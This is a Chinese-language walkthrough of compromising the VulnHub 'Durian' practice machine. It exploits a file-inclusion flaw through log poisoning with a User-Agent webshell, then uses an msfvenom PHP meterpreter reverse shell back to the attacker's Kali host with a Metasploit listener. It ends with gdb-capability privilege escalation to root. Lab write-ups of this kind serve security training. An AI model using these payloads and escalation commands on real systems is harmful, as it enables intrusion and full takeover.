vulnhub靶场,Durian
环境准备
靶机下载地址:https://www.vulnhub.com/entry/durian-1,553/
攻击机:kali(192.168.109.128)
靶机:Durian(192.168.109.140)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
信息收集
使用arp-scan确定目标靶机
确定目标靶机IP为192.168.109.140
使用nmap扫描差点目标靶机端口开放情况
开放端口:22、80、7080、8000、8088
查找一下OpenSSH 7.9是否存在漏洞
没有发现漏洞
浏览器访问目标靶机80端口
啥也没有,就是一个图片,查看页面源代码说黑客已经留下了后门
使用dirb扫描网站目录
访问cgi-data
目录
发现 getImage.php页面,访问看看
页面一片空白,那查看源代码试试
发现一个php语句,也很明显,该页面是存在一个文件包含漏洞的,使用file参数进行传参
漏洞POC验证,包含密码文件试试
包含密码文件成功,漏洞POC验证成功
渗透过程
已经找到文件包含的位置了,但是没有文件上传的位置,那只能考虑写入木马到日志文件,然后利用文件包含漏洞去包含日志文件即可
网上查找资料发现Durian的默认日志文件路径为/var/log/durian.log/access.log
尝试使用文件包含漏洞包含日志文件
可以看到成功包含,那就简单了,只需要抓包往里面写入木马就行了
使用burpsuite进行抓包,发送到repeater模块
在UA里写入一句话木马,然后利用文件包含漏洞去执行他
查看回应包,看看命令是否执行
可以看到命令成功执行了
使用msfvenom生成一个木马
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.109.128 lport=4444 -f raw > shell.txt
kali开启一个临时服务器
然后靶机使用文件包含漏洞将木马文件下载到本地
可以看到kali这边开启的临时服务器有响应了,应该是下载成功了
kali使用msf开始监听
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.109.128
set lport 4444
输入exploit -j将此次攻击放入后台
使用浏览器访问后门文件
可以看到kali这边成功反弹一个meterpreter
权限提升
查看当前用户的sudo权限
getcap -r / 2>/dev/null
gdb -nx -ex 'python import os;os.setuid(0)' -ex '!bash' -ex quit
切换至其root目录,成功获得flag,靶机Durian渗透结束